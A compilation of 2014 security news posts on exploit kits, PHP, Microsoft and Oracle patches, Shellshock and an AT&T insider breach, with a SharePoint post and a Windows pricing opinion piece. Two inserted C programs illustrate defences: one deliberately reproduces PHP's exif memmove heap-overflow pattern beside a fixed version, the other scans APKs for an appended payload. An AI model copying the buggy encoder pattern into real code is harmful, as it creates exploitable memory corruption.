Recently Patched Flash Player Vulnerability Added to Exploit Kit
Posted on October 23, 2014 by Kara Dunlap in Security
An exploit for a Flash Player vulnerability that was patched just over one week ago by Adobe has already been added by cybercriminals to an exploit kit.
The French malware researcher known as “Kafeine” was the one who first noticed the integration of the exploit for CVE-2014-0569, a Flash Player integer overflow flaw that could lead to arbitrary code execution, into the Fiesta exploit kit. The expert made the discovery while trying to analyze a different Flash vulnerability (CVE-2014-0556).
The vulnerability was reported to Adobe privately through HP’s Zero Day Initiative (ZDI) program so everyone is wondering how the cybercriminals managed to get their hands on the exploit in such a short period of time.
Kafeine told SecurityWeek that he believes the cybercriminals reverse engineered the patch released by Adobe to build their exploit.
“The criminals built this vulnerability into an exploit kit in record time. Whether they were given a heads-up, or just have a highly skilled reverse engineer, both scenarios are equally worrisome as it increases the possible window of infection,” Jerome Segura, senior security researcher from Malwarebytes Labs, told SecurityWeek. “Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. Browsing the net on an unpatched computer is like playing Russian roulette with a handful of loaded guns.”
“The bad guys are not going to run short of vulnerabilities they can weaponize, and if this happens at a quicker rate than ever before, their success rate will increase. This leaves end users with very little room for mistakes, such as failing to diligently apply security patches sooner rather than later,” Segura added.
Initially, Kafeine believed the exploit for CVE-2014-0569 was integrated into the Angler exploit kit as well, but in an update made to his original blog post, the researcher noted that the exploit included in Angler actually appears to be for a different Flash vulnerability patched by Adobe last week.
In the case of the Angler exploit kit, the first payload that’s distributed is Bedep (detected by Malwarebytes as Trojan.FakeMS.ED), which enrolls infected computers into a botnet. The final payload is a variant of the notorious Zeus banking Trojan, Kafeine said.
Both the Fiesta and Angler exploit kits are popular among cybercriminals. Angler was recently involved in a malvertising campaign targeting several high-profile websites, including Java.com.
PHP 5 Updates Fix Several Security Vulnerabilities
Posted on October 20, 2014 by Kara Dunlap in Security
PHP released last week versions 5.6.2, 5.5.18 and 5.4.34 of the scripting language. In addition to some functionality bugs, the latest releases address a series of security-related flaws.
According to the PHP development team, a total of four vulnerabilities have been fixed in PHP 5.6 and PHP 5.5, and six flaws in PHP 5.4.
One of the security bugs, CVE-2014-3669, is a high-severity integer overflow vulnerability in PHP’s “unserialize()” function. When the function is used on untrusted data, the flaw could lead to a crash or information disclosure. It’s unclear at this point if arbitrary code execution is also possible, says an advisory for this bug published on the Red Hat Bugzilla website. The issue only affects 32-bit systems.
Another vulnerability fixed by PHP has been assigned the CVE identifier CVE-2014-3668. The medium-severity security hole, which is caused by an out-of-bounds read flaw in the “mkgmtime()” function, could lead to a crash of the PHP interpreter.
CVE-2014-3669 and CVE-2014-3668 were reported to PHP in September by a researcher from Geneva, Switzerland-based IT security firm High-Tech Bridge.
Otto Ebeling, a software engineer at Facebook, reported a bug that causes heap corruption when parsing the thumbnail of a specially crafted .jpg image. This heap corruption affecting the “exif_thumbnail()” function has been assigned CVE-2014-3670.
“PHP provides APIs such as exif_thumbnail that can be used to extract embedded thumbnails from various image formats. In the process of extracting a TIFF-formatted EXIF thumbnail from a JPEG image, PHP re-encodes most IFD tags present in the thumbnail directory and prepends them to the thumbnail image in order to produce a standalone TIFF file,” Ebeling wrote in his report. “Individual values are re-encoded using the exif_ifd_make_value function. If this function is asked to write out an array of floating point values (single or double precision), it erroneously uses the size of the whole array when copying individual elements using memmove, leading to heap corruption.”
“To exploit a target application that uses this API (or exif_read_data with suitable parameters), a malicious user can trigger this condition by supplying a tag that contains an array of floating-point values, and further tags that indicate the presence of a TIFF thumbnail. The image itself need not be valid as long as the exif_ifd_make_value gets invoked,” the expert explained.
According to Ebeling, the affected code is also included in the open-source virtual machine HHVM.
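The flaw Ebeling describes is a per-element copy that is handed the byte length of the whole array. The C program below is an added illustration, not PHP's or HHVM's code: it reproduces that pattern against a destination with a canary region so the overrun is observable, and shows the hardened form that copies one element per iteration and checks capacity before starting. Function names such as encode_floats_buggy, encode_floats_fixed and guard_clobbered_by, and the sample float values, are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GUARD_BYTE 0xA5

/* Destination slot followed by a canary ("guard") region, so an over-long
   memmove is detected here instead of silently corrupting a neighbouring heap chunk. */
typedef struct {
    unsigned char *buf;
    size_t slot_bytes;   /* bytes the encoder is allowed to write */
    size_t guard_bytes;  /* canary bytes that must stay untouched */
} guarded_buf;

static int guarded_alloc(guarded_buf *g, size_t slot_bytes, size_t guard_bytes)
{
    g->buf = malloc(slot_bytes + guard_bytes);
    if (g->buf == NULL) return -1;
    g->slot_bytes = slot_bytes;
    g->guard_bytes = guard_bytes;
    memset(g->buf, 0, slot_bytes);
    memset(g->buf + slot_bytes, GUARD_BYTE, guard_bytes);
    return 0;
}

static int guard_intact(const guarded_buf *g)
{
    for (size_t i = 0; i < g->guard_bytes; i++)
        if (g->buf[g->slot_bytes + i] != GUARD_BYTE) return 0;
    return 1;
}

/* The flaw class from the advisory: every per-element memmove gets the byte length
   of the WHOLE array. Only called here with padded buffers so the demo stays in bounds. */
static void encode_floats_buggy(const float *vals, size_t n, unsigned char *out)
{
    size_t whole_array = n * sizeof(float);
    for (size_t i = 0; i < n; i++)
        memmove(out + i * sizeof(float), &vals[i], whole_array);
}

/* Hardened form: one element per iteration, and refuse to start unless the
   caller's buffer holds n elements (the multiplication itself is guarded too). */
static long encode_floats_fixed(const float *vals, size_t n,
                                unsigned char *out, size_t out_cap)
{
    if (n > SIZE_MAX / sizeof(float)) return -1;
    size_t need = n * sizeof(float);
    if (need > out_cap) return -1;
    for (size_t i = 0; i < n; i++)
        memmove(out + i * sizeof(float), &vals[i], sizeof(float));
    return (long)need;
}

/* Encode a constructed n-element array with one of the two encoders and report
   whether the guard was clobbered (1), left intact (0), or the demo could not run (-1). */
static int guard_clobbered_by(int use_buggy, size_t n)
{
    const size_t elem = sizeof(float);
    if (n == 0) return -1;
    /* The buggy copy that starts at element n-1 reaches (2n-1)*elem bytes,
       so source and destination both get that much headroom for the demo. */
    size_t headroom = (n - 1) * elem + 16;
    float *src = calloc(n + headroom / elem + 1, elem);
    guarded_buf g;
    if (src == NULL) return -1;
    if (guarded_alloc(&g, n * elem, headroom) != 0) { free(src); return -1; }
    for (size_t i = 0; i < n; i++) src[i] = (float)(i + 1) * 1.5f;  /* constructed values */

    int rc = 0;
    if (use_buggy)
        encode_floats_buggy(src, n, g.buf);
    else if (encode_floats_fixed(src, n, g.buf, g.slot_bytes) < 0)
        rc = -1;
    if (rc == 0) rc = guard_intact(&g) ? 0 : 1;
    free(src);
    free(g.buf);
    return rc;
}

/* The capacity check must reject a buffer that cannot hold the array. */
static int fixed_rejects_short_buffer(void)
{
    float vals[4] = { 1.0f, 2.0f, 3.0f, 4.0f };   /* constructed input */
    unsigned char small[8];
    return encode_floats_fixed(vals, 4, small, sizeof small) == -1;
}

int main(void)
{
    printf("buggy encoder, 4 floats: guard clobbered = %d\n", guard_clobbered_by(1, 4));
    printf("fixed encoder, 4 floats: guard clobbered = %d\n", guard_clobbered_by(0, 4));
    printf("fixed encoder rejects 8-byte buffer: %d\n", fixed_rejects_short_buffer());
    return 0;
}
```

With a single-element array both encoders behave identically, which is why a bug of this shape survives tests that never use multi-value float tags.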
PHP 5.4, 5.5 and 5.6 users are advised to update their installations as soon as possible. Additional information on the fixes is available in the changelogs.
Researchers Hide Android Applications in Image Files
Posted on October 17, 2014 by Kara Dunlap in Security
AMSTERDAM – BLACK HAT EUROPE – Researchers have found a way to trick Android users into executing potentially malicious applications by hiding them inside innocent-looking image files.
Axelle Apvrille, mobile/IoT malware analyst and researcher at Fortinet, and Ange Albertini, reverse engineer and author of Corkami.com, have created an application that can be used to encrypt an APK to make it look like a PNG image file.
In a real attack leveraging this method, the attacker sends an application containing an image to the potential victim. When the app is launched, the victim only sees the harmless-looking image. In the background however, a malicious payload is installed onto the victim’s Android device.
In order to hide the installation of the malicious payload, the attacker can leverage the DexClassLoader constructor, the experts said.
According to the researchers, the method works on Android 4.4.2 and prior versions of the operating system. Google developed a fix for the flaw back in June, but Apvrille told SecurityWeek in an interview that the fix is incomplete. The researchers have informed Google of this and the company is now working on a more efficient fix.
How does it work?
The attacker writes his malicious payload and encrypts it to make it look like a valid PNG image file. The encryption is done with AngeCryption, an application developed by the researchers.
Controlling AES encryption can be a difficult task, but AngeCryption is designed to encrypt the APK so that Android doesn’t see any difference. Furthermore, the resulting image looks normal to users, except for the fact that it’s 500Kb in size, which is a bit much for a small resolution image.
The final step is to create a wrapping APK in which the malicious PNG is inserted, and then decrypted and installed.
When Android APKs are written, they must end with an End of Central Directory (EOCD) marker. The researchers managed to add their specially crafted PNG file to the APK by appending it after the first EOCD and adding a second EOCD at the end.
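The layout just described (a payload appended after the first EOCD, with a second EOCD closing the file) is something a defender can check for before an APK is trusted. The C scanner below is an added example, not the researchers' tool or Android's parser: it counts EOCD records in a ZIP image and measures the data that follows the first one beyond its declared comment. The sample bytes are constructed here; scan_apk and apk_has_trailing_data are my own names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define EOCD_SIG     0x06054b50u   /* "PK\5\6" read as a little-endian u32 */
#define EOCD_MIN_LEN 22            /* fixed part of the End of Central Directory record */

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

typedef struct {
    size_t eocd_count;      /* EOCD signatures found anywhere in the image */
    size_t first_eocd_off;  /* offset of the first one, SIZE_MAX if none */
    size_t trailing_bytes;  /* bytes after the first EOCD record and its comment */
} apk_scan;

/* Walk the whole image for EOCD signatures. A well-formed archive has exactly
   one, ending the file (followed at most by its declared comment); a second
   record, or data beyond the first, is the layout the researchers describe.
   A signature-looking byte sequence inside compressed data would also match,
   so a hit is a reason to inspect the file, not proof of tampering. */
static apk_scan scan_apk(const unsigned char *buf, size_t len)
{
    apk_scan r = { 0, SIZE_MAX, 0 };
    for (size_t i = 0; i + EOCD_MIN_LEN <= len; i++) {
        if (rd32(buf + i) != EOCD_SIG) continue;
        if (r.eocd_count == 0) {
            size_t comment_len = rd16(buf + i + 20);   /* .ZIP file comment length */
            size_t end = i + EOCD_MIN_LEN + comment_len;
            r.first_eocd_off = i;
            r.trailing_bytes = (end < len) ? len - end : 0;
        }
        r.eocd_count++;
    }
    return r;
}

/* 1 if the image has a suspicious layout, 0 if it looks ordinary. */
static int apk_has_trailing_data(const unsigned char *buf, size_t len)
{
    apk_scan r = scan_apk(buf, len);
    return r.eocd_count != 1 || r.trailing_bytes != 0;
}

/* Constructed samples: an empty archive (one 22-byte EOCD, zero entries), and the
   same archive with 8 placeholder bytes appended and a second EOCD closing it. */
static const unsigned char SAMPLE_CLEAN[22] = {
    0x50,0x4b,0x05,0x06, 0,0, 0,0, 0,0, 0,0, 0,0,0,0, 0,0,0,0, 0,0
};
static const unsigned char SAMPLE_DOUBLE_EOCD[52] = {
    0x50,0x4b,0x05,0x06, 0,0, 0,0, 0,0, 0,0, 0,0,0,0, 0,0,0,0, 0,0,   /* EOCD #1 */
    0x89,0x50,0x4e,0x47,0x0d,0x0a,0x1a,0x0a,   /* PNG-style magic standing in for a payload */
    0x50,0x4b,0x05,0x06, 0,0, 0,0, 0,0, 0,0, 0,0,0,0, 0,0,0,0, 0,0    /* EOCD #2 */
};

int main(void)
{
    apk_scan r = scan_apk(SAMPLE_DOUBLE_EOCD, sizeof SAMPLE_DOUBLE_EOCD);
    printf("EOCD records: %zu, first at %zu, trailing bytes: %zu, flagged: %d\n",
           r.eocd_count, r.first_eocd_off, r.trailing_bytes,
           apk_has_trailing_data(SAMPLE_DOUBLE_EOCD, sizeof SAMPLE_DOUBLE_EOCD));
    printf("clean sample flagged: %d\n",
           apk_has_trailing_data(SAMPLE_CLEAN, sizeof SAMPLE_CLEAN));
    return 0;
}
```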
Massive Oracle Security Update Lands on Microsoft Patch Tuesday
Posted on October 15, 2014 by Kara Dunlap in Security
Microsoft and Oracle customers will have their hands full applying a spate of security updates that were issued today.
Microsoft released eight security bulletins as part of Patch Tuesday, including critical updates for Internet Explorer, Windows and the .NET Framework. The bulletins address a total of 24 vulnerabilities, including a handful that are known to have already come under attack.
But the Microsoft release is dwarfed in size by the more than 150 security fixes issued today by Oracle. Within those patches are 31 fixes for the Oracle Database, several of which have a CVSS Base Score of 9.0.
“This CVSS 9.0 Base Score reflects instances where the user running the database has administrative privileges (as is typical with pre-12 Database versions on Windows),” explained Oracle Software Security Assurance Director Eric Maurice in a blog post. “When the database user has limited (or non-root) privilege, then the CVSS Base Score is 6.5 to denote that a successful compromise would be limited to the database and not extend to the underlying Operating System. Regardless of this decrease in the CVSS Base Score for these vulnerabilities for most recent versions of the database on Windows and all versions on Unix and Linux, Oracle recommends that these patches be applied as soon as possible because a wide compromise of the database is possible.”
The Oracle update also provides fixes for 25 new Java SE vulnerabilities, the most severe of which has a CVSS Base Score of 10.0. Out of the 25, 20 affect client-only deployments of Java SE, and two of these are browser specific. Four vulnerabilities meanwhile affect client and server deployments of Java SE, while one affects client and server deployments of JSSE, Maurice noted.
The remaining vulnerabilities impact: Oracle Fusion Middleware; Oracle Enterprise Manager Grid Control; Oracle E-Business Suite; Oracle Supply Chain Product Suite; Oracle PeopleSoft Enterprise; Oracle JDEdwards EnterpriseOne; Oracle Communications Industry Suite; Oracle Retail Industry Suite; Oracle Health Sciences Industry Suite; Oracle Primavera; Oracle and Sun Systems Product Suite; Oracle Linux and Virtualization and Oracle MySQL.
In the case of Microsoft, customers will have their hands full with issues of their own. Three of the bulletins released today by Microsoft are rated ‘critical’ – MS14-056, MS14-057 and MS14-058.
MS14-056 is the biggest of the updates, and addresses 14 privately-reported issues in Internet Explorer. The most severe of these could allow remote code execution if a user views a specially-crafted webpage using Internet Explorer.
“This is another Patch Tuesday that easily fuels future drive-by web attacks for the months ahead,” said Marc Maiffret, CTO of BeyondTrust. “Beyond just code execution there also exists the ability to bypass ASLR (Address Space Layout Randomization) which is a helpful OS security mitigation for exploitation. This ASLR bypass can be used in conjunction with other vulnerabilities for more successful exploitation where it might not have been possible in the past. It should be noted that Microsoft’s EMET technology will help mitigate some of these attacks and even more importantly these client application vulnerabilities are a great reminder of the need for Least Privilege in making sure users are not running as Administrator.”
MS14-056, he said, should be prioritized first, with the remaining critical updates coming next. MS14-058 contains fixes for two issues in Windows that are already known to be under attack.
“The more severe of the vulnerabilities could allow remote code execution if an attacker convinces a user to open a specially crafted document or to visit an untrusted website that contains embedded TrueType fonts,” according to Microsoft. “In all cases, however, an attacker would have no way to force users to perform these actions. Instead, an attacker would have to persuade users to do so, typically by getting them to click a link in an email message or Instant Messenger message.”
The final critical bulletin is MS14-057, which addresses vulnerabilities in the .NET Framework. According to Microsoft, the most severe of these could allow remote code execution if an attacker sends a specially-crafted URI request containing international characters to a .NET web application. In .NET 4.0 applications, the vulnerable functionality (iriParsing) is disabled by default; for the vulnerability to be exploitable an application has to explicitly enable this functionality. In .NET 4.5 applications, iriParsing is enabled by default and cannot be disabled.
The remaining bulletins are rated ‘Important’ and cover issues in Microsoft Windows, Developer Tools and Microsoft Office.
Adobe Systems also released patches today to address issues in Adobe Flash Player.
“Adobe is releasing an update to their Flash player with advisory APSB14-22, which addresses three RCE [remote code execution] type vulnerabilities,” blogged Qualys CTO Wolfgang Kandek. “Installations that run the newer Internet Explorer 10 and 11 get this update automatically. Users of older browsers or on other operating systems should apply this critical update manually.”
Pros and Cons of the Access App for SharePoint 2013
Posted on October 14, 2014 by Kara Dunlap in SharePoint
Tags: SharePoint 2013
Enterprise Personal & Collaboration
Why are Access 2013 Apps great? Here are a few of the reasons:
They have a SQL Server backend
You can use SQL Server Reporting Services, Excel, or any other product that supports SQL Azure or SQL Server over ODBC to create reports on the Access App data
When you use App Templates or Tables, views and navigation are created automatically
There are new Related Item controls that make building views easy, and they have a consistent look and feel
One-click deployment!
The search capability is built in and is user-friendly
What are SharePoint 2013 Apps?
They enable developers to build custom applications that can be published to the Office Store for public download, or to the Corporate Catalog, which is a company’s internal App Catalog site; users can then add them to their SharePoint sites. Included in the out-of-the-box apps is an Access App, which makes it easy for Access 2013 data sources to be added to SharePoint 2013 sites.
What exactly is the Access App?
This out-of-the-box, no-code app lets us put Access data sources into SharePoint, and it comes with some really great features (listed above) that I will go into in a bit more detail in the next sections. The purpose of the app is to provide a more reliable, faster and more durable option for putting relational data into SharePoint, without the trouble of building something from the ground up. Microsoft Office Access 2013 includes several templates for Access web apps and tables that will get you started.
Top Access App Features
It is a great alternative to creating a list in SharePoint when you know it will grow to be a “large list”. Not only does it help manage large data sets and provide fast access to the data, it also lets external SQL Server and SQL Azure supported tools get access to the data.
Want to know how it works?
When you create the app in Microsoft Office Access 2013, you choose the site where it will live.
In the process of deploying the app to SharePoint, a SQL database is provisioned that will house all the objects and data the app needs.
The database that is created is specific to your app and, by default, is not shared with other apps.
When you create a table in the app, a table is created in the database.
When you create a query in the app, a SQL Server view is created, or, if your query takes a parameter, a table-valued function is created.
When you create a standalone macro in the app, a stored procedure is created in SQL Server.
Views in Access are the components of your app that display the data in the web browser. They are also stored in the database, but as text, because they are HTML and JavaScript rather than SQL objects.
Other Really Great Benefits Worth Mentioning
When building the Access App, you can choose from one of several simple and quick templates or start from scratch with a custom app. That’s it: in just a few clicks you have a working SharePoint app. Either way, once you have designed your database, click Launch App and you have a no-code app in SharePoint that includes a search tool.
By Amy Sawtell, December 10, 2013
Source: http://www.cardinalsolutions.com/cardinal/blog/portals/2013/12/the_pros_and_consof.html
The future of Microsoft depends upon Windows being free
Posted on October 13, 2014 by Kara Dunlap in Microsoft Windows
The value of OS upgrades has been completely lost in a time when we’re used to getting free updates for our phones for as long as they can still handle the software. Why doesn’t the same model apply to the PC yet? Microsoft has already adopted free upgrades for Windows Phone, so why not for the PC?
Microsoft has stayed quiet on its plans for Windows pricing in future, but it did make it free for consumers to upgrade from Windows 8 to 8.1, and we understand the upgrade from 8 to 10 will be free, but will this continue? The company recently unveiled Windows 10 but didn’t say whether it would be another free upgrade or not; however, it probably should be a free upgrade for most Windows customers.
Microsoft needs to decouple the business and consumer markets if it wants to maintain its iron grip on the future PC market. It’s entirely reasonable to expect businesses to pay for licensed software, even if only to get extended updates and support, but expecting the end user to care enough to spend over $100 to upgrade every two years is absurd.
For many consumers, Windows upgrades are directly tied to when they replace their PCs. Why else would so many people not even bother to upgrade from XP? Their PCs are perfectly capable of running Windows 7, but why would they want to pay $130 just to get the latest software? Change can be hard, and rather than bothering to pay for a new license and upgrade, these customers have chosen to stay on unsupported versions because it ‘works’ fine.
Making Windows free has a number of tangible benefits for Microsoft; not only does it encourage customers to upgrade regularly (and removes almost all barriers to doing so), it means that users are more likely to use the latest version of Microsoft products and connected services. It also means that Microsoft could eliminate all the confusing and unnecessary SKU options and concentrate on two markets: consumer and enterprise.
Imagine Windows 10 were made free for all users from Vista and up: the install base would rapidly move to the latest version (just as OS X users, or iOS users, flock to the latest release), meaning less legacy support for Microsoft and the ability to advertise bigger numbers. The company could simply have a different version, and a charge, for those using Windows in business settings.
Because it’s free for many home users to get the latest version of Windows, it seems likely that these same users would be more willing to pay for related services via subscription instead, like OneDrive or Office 365, which would amount to far more recurring revenue for the company.
I anticipate that Microsoft has already come to this same, inevitable conclusion and will make Windows 10 free for those using Windows 7 and up. It’s probably a tough decision for the company (Windows is a $5 billion a year business), but it’s a crucial one that it has to make in order to stay relevant.
As fewer and fewer PCs are sold each year, the company needs to look for other ways to generate revenue by offering supporting services on a longer-term basis rather than trying to persuade people to drop the money on an upgrade every three years.
Consumers simply aren’t buying new computers any more, as they last longer or people switch to depending on phones and tablets, so Microsoft has to seek new ways of generating revenue beyond Windows. Windows will become the conduit for consumers to purchase Microsoft services.
The days of paid Windows upgrades have met their end, even if Microsoft hasn’t admitted it yet.
Remember the days when you would head out to the shop to pick up the latest version of Windows, on DVD, for something like $130? Those days might seem in the distant past, but in truth Microsoft is still charging for upgrades between major versions, even as of Windows 8.1.
- By Owen Williams, thenextweb.com
WordPress is the Most Attacked CMS: Report
Posted on October 12, 2014 by Kara Dunlap in Security
Data security firm Imperva released its fifth annual Web Application Attack Report (WAAR) this week, a study designed to track the latest trends and cyber threats facing web applications.
The report, which is based on the analysis of 99 applications over a period of nine months (August 1, 2013 – April 30, 2014), determined that WordPress is the most targeted content management system (CMS). In fact, WordPress websites were attacked 24.1% more than sites running on all other CMS platforms combined.
“WordPress has been in the headlines, in the past couple of years, both because of its popularity, and because of the amount of vulnerabilities found in its application and exposed by hackers. We believe that popularity and a hacker’s focus go hand-in-hand. When an application or a platform becomes popular, hackers realize that the ROI from hacking into these platforms or applications will be fruitful, so they spend more time researching and exploiting these applications, either to steal data from them, or to use the hacked systems as zombies in a botnet,” the report reads.
This year’s WAAR also makes a comparison between attacks targeting PHP and .NET applications. It turns out that PHP apps suffer almost three times more cross-site scripting (XSS) attacks than ASP applications, and nearly two times more directory traversal attacks. On the other hand, Imperva has determined that ASP applications suffer twice as many SQL injection attacks as PHP applications.
When it comes to websites, unsurprisingly, ones that have login functionality and implicitly store consumer-specific information are the most targeted.
Nearly half of all the attacks observed by Imperva during the nine month period targeted the retail sector, followed at a distance by financial institutions which accounted for 10% of all Web application attacks.
Compared to the previous period reviewed by the company (June 1, 2012 – November 30, 2012), attacks have been 44% longer. A 10% increase was also observed in SQL injection attacks, and a 24% increase in remote file inclusion (RFI) attacks.
As far as attack sources are concerned, Imperva found that the United States generates most of the Web application attack traffic.
“In our educated opinion, based on years of analyzing attack data and origins, we propose that attackers from other countries are using U.S. hosts to attack, based on those hosts being geographically closer to targets,” the report reads.
“While this may be overwhelming, we believe that there is more to this picture. Attacks originating in the U.S. may indicate other things such as TOR exit nodes, Botnet infected machines, etc., and so this information needs to be looked at in proportion. What it potentially teaches us is the quality of targets. It makes sense for an attacker to execute the attack as close to the target as possible, to remain undetected or to maximize the available bandwidth of the attack.”
Attackers are increasingly leveraging cloud and infrastructure-as-a-service (IaaS) hosted applications and servers. Imperva has found that 20% of all known vulnerability exploitation attempts and 10% of all SQL injection attempts originated in Amazon Web Services (AWS) source IPs.
The complete Web Application Attack report from Imperva is available here.
Yahoo! Changes Tune After Saying Servers Were Hacked By Shellshock
Posted on October 7, 2014 by Kara Dunlap in Security
On Monday afternoon, Yahoo confirmed to SecurityWeek that servers associated with Yahoo Games had been hacked as a result of the recently disclosed “Shellshock” vulnerability, but has since said its original conclusion was wrong.
In its original statement issued Monday afternoon, the company said that on Sunday night, a “handful” of its servers were impacted but said there was no evidence of a compromise to user data.
Hours later, Yahoo! contacted SecurityWeek with a change in tune, saying that after all, the servers in question were NOT compromised via the Shellshock vulnerability, but rather by a “minor bug in a parsing script”.
“Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by Shellshock. After investigating the situation fully, it turns out that the servers were in fact not affected directly by Shellshock, but by a minor bug in a parsing script,” a Yahoo! spokesperson told SecurityWeek. “Regardless of the cause, our course of action remained the same — to isolate the servers at risk and protect our users’ data.”
The company maintained its position that no evidence has been found suggesting that user information was affected by the incident.
Yahoo! CISO Alex Stamos provided additional details in a post to Y Combinator’s Hacker News.
“Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers,” Stamos explained. “These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.
Stamos, who became VP of Information Security and CISO at Yahoo! in March 2014, continued:
“As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected!”
The original story with more background on the incident can be found here.
AT&T Admits Insider Illegally Accessed Customer Data
Posted on October 6, 2014 by Kara Dunlap in Security
AT&T is advising customers that a rogue employee illegally accessed their personal information.
In a breach notification letter sent to customers and the Vermont attorney general, AT&T explained the breach occurred in August. The employee responsible is no longer with the company.
According to the letter, the employee was able to view and may have accessed customer information ranging from social security numbers to driver’s license numbers. In addition, while accessing user accounts, the employee would have been able to view their Customer Proprietary Network Information (CPNI) without authorization. CPNI data is associated with services customers purchase from AT&T.
It is not clear how many customers were affected by the breach or if consumers in other states may have been involved.
“AT&T’s commitments to customer privacy and data security are top priorities, and we take those commitments seriously,” according to the letter.
“Simply stated, this is not the way we conduct business, and as a result, this individual no longer works here,” the letter notes.
AT&T is offering affected consumers a year of free credit monitoring, and said in the letter that any unauthorized changes that had been made to accounts would be reversed. The company has contacted federal law enforcement as well.
Earlier this year, employees of one of AT&T’s service providers accessed customer information without authorization as well. According to AT&T, the perpetrators in that case were trying to gather information that could be used to request codes to unlock AT&T mobile phones so that they could be used with other telecommunications providers.
“Insiders are worse than hackers because there’s no way to protect against them that’s truly effective,” opined Jonathan Sander, strategy and research officer for STEALTHbits Technologies. “If you need to do business, you need people to access information. If the wrong person or the person in the wrong frame of mind decides to use that access badly, what can you do?”
“This proves, yet again, that humans are the weakest link in any security plan,” he added. “It’s the old IT administrator joke about a system error called PEBKAC – Problem Exists Between Keyboard And Chair.”
Feedback Friday: ‘Shellshock’ Vulnerability – Industry Reactions
Posted on September 28, 2014 by Kara Dunlap in Security
The existence of a highly critical vulnerability affecting the GNU Bourne Again Shell (Bash) has been brought to light this week. The security flaw is considered by some members of the industry as being worse than the notorious Heartbleed bug.
GNU Bash is a command-line shell used in many Linux, Unix and Mac OS X operating systems. The vulnerability (CVE-2014-6271) has been dubbed “Bash Bug” or “Shellshock” and it affects not only Web servers, but also Internet-of-Things (IoT) devices such as DVRs, printers, automotive entertainment systems, routers and even manufacturing systems.
By exploiting the security hole, an attacker can execute arbitrary commands and take over the targeted machine. Symantec believes that the most likely route of attack is through Web servers that use CGI (Common Gateway Interface). There have already been reports of limited, targeted attacks exploiting the vulnerability.
A patch has been made available, but it’s incomplete. Until a permanent fix is rolled out, several organizations have launched Shellshock detection tools. Errata Security has started scanning the Web to find out how many systems are affected, and Symantec has published a video to demonstrate how the flaw can be exploited.
The security community warns that the vulnerability can have serious effects, and points out that it could take a long time until all systems are patched.
And the Feedback Begins…
Ian Pratt, Co-founder and EVP at Bromium:
“The ‘shellshock’ bash vulnerability is a big deal. It’s going to impact large numbers of internet-facing Linux/Unix/OS X systems as bash has been around for many years and is frequently used as the ‘glue’ to connect software components used in building applications. Vulnerable network-facing applications can easily be remotely exploited to allow an attacker to gain access to the system, executing with the same privilege the application has. From there, an attacker would attempt to find a privilege escalation vulnerability to enable them to achieve total compromise.
Bash is a very complex and feature-rich piece of software that is intended for interactive use by power users. It does way more than is typically required for the additional role for which it is often employed in gluing components together in applications. Thus it presents an unnecessarily broad attack surface — this likely won’t be the last vulnerability found in bash. Application developers should try to avoid invoking shells unless absolutely necessary, or use minimalist shells where required.”
Mark Parker, Senior Product Manager at iSheriff:
“This bash vulnerability is going to prove to be a much bigger headache than Heartbleed was. In addition to the general Mac OS X, Linux and Unix systems that need to be patched, there are also thousands upon thousands of Internet connected Linux and Unix based embedded devices, such as DVRs, home automation systems, automotive entertainment systems, mobile phones, home routers, manufacturing systems and printers.
Most of these devices will be susceptible because most Linux based devices run bash, it is such an integral part of the Linux OS. I anticipate that we will continue to see the fallout from this vulnerability for a long time to come.”
Carl Wright, General Manager of TrapX Security:
“We feel that industry will take this very seriously and come out with patches for this vulnerability ASAP. It could take us years to understand how many systems were compromised and how many were used to escalate privileges into systems without this vulnerability. The transitive trust nature of directory architectures and authentication systems could mean we are living with this far beyond patching the current systems if this exploit has been taken advantage of even at a small 1% level.”
Coby Sella, CEO of Discretix:
“This is the second time over the last six months when a key infrastructure component used by billions of connected things across a variety of industries has been compromised. We see this problem only getting worse as more and more unsecured or not adequately secured things are rolled out without any comprehensive security solution that reaches all the way down to the chipset. Real solutions to this problem must cover every layer from the chipset to the cloud enabling companies to remotely insert secrets into the chipset layer via secured connections within their private or cloud infrastructure.”
Nat Kausik, CEO, Bitglass:
“Enterprises with ‘trusted endpoint’ security models for laptops and mobile devices are particularly vulnerable to this flaw. Malware can exploit this vulnerability on unix-based laptops such as Mac and Chromebook when the user is away from the office, and then spread inside the corporate network once the user returns to the office.”
Steve Durbin, Managing Director of the Information Security Forum:
“The Bash vulnerability simply stresses the point that there is no such thing as 100% security and that we all need to take a very circumspect and practical approach to how we make use of the devices that we use to share data both within and outside the home and our businesses. I have my doubts on whether or not this will lead to a wave of cyber-attacks, but that is not to say that the vulnerability shouldn’t be taken seriously. It is incumbent upon all of us as users to guard our data and take all reasonable precautions to ensure that we are protecting our information as best as we are realistically able.”
Steve Lowing, Director of Product Management, Promisec:
“Generally, the Bash vulnerability could be really bad for systems, such as smart devices including IP cameras, appliances, embedded web servers on routers, etc… which are not updated frequently. The exposure for most endpoints is rapidly being addressed in the form of patches to all flavors of UNIX including Redhat and OS X. Fortunately for Microsoft, they avoid much of this pain since most Windows systems do not have Bash installed on them.
For vulnerable systems, depending on how they are leveraging the Bash shell the results could be grave. For example, a webserver that uses CGI would likely be configured to use Bash as the shell for executing commands and compromising this system via this vulnerability is fairly straightforward. The consequences could be to delete all web content which could mean service level agreements (SLAs) are not met because of complete outage or deface the site which tarnishes your brand or even to be a point of infiltration for a targeted attack which could mean IP and/or sensitive customer information loss.
The IoT is likely under the biggest risk since many of these devices and appliances are not subject to frequent software updates like a desktop or laptop or server would be. This could result in many places for an attacker to break into and lie in wait for sensitive information to come their way.”
